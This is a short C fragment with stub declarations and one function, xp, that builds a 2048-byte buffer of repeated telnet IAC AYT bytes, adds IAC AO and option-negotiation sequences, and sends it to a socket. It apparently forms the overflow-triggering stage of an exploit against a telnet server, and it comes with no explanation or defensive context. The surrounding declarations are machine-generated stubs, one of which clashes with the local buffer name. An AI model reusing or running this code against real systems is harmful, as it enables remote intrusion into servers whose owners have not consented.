
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buf ;


 int bs ;
 int mode ;
 int num ;
 int perror (char*) ;
 int send (int,unsigned char*,int,int ) ;

void
xp (int fd)
{
        int n;
        unsigned char buf[2048];



        for (n = bs ; n < sizeof (buf) ; ++n)
                buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';


        buf[0] = '\xff';
        buf[1] = '\xf5';

        if (mode == 16) {
                buf[2] = '\xff';
                buf[3] = '\xfb';
                buf[4] = '\x26';
        }


        buf[num++] = '\xff';
        buf[num++] = '\xfb';
        buf[num++] = '\x08';


        buf[num++] = '\xff';
        buf[num++] = '\xf6';


        n = send (fd, buf, num, 0);
        if (n != num) {
                perror ("xp:send");
        }
}
